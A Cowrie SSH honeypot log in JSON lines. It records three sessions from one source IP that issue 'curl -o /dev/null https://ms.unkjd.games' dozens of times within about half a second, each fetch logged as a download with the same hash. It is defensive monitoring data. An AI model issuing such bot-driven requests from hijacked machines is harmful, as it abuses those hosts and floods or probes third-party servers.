{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.973310Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.975039Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.975667Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.978804Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.983013Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.985530Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.986763Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.987368Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.012697Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.014533Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.016834Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.018728Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.020367Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.020887Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.022902Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.023509Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.027412Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.028025Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.058625Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.061067Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.061630Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.063533Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.064646Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.067176Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.067860Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.100768Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.102506Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.103739Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.104511Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.106526Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.107193Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.110125Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.110865Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.136722Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.161775Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.163566Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.164639Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.165370Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.166885Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.167444Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.170494Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.174817Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.175423Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.205787Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.207650Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.208987Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.209455Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.212702Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.213395Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.215234Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.215848Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.220225Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.222930Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.248627Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.250293Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.251274Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.251983Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.255472Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.256083Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.259994Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.260464Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.289288Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.290359Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.290984Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.294902Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.297049Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.298273Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.298798Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.301281Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.303313Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.303835Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.329975Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.331680Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.332931Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.333444Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.338871Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.339412Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.341672Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.342296Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.372052Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:49.372698Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:49.374966Z","src_ip":"212.227.125.160","session":"9f264c568782"}
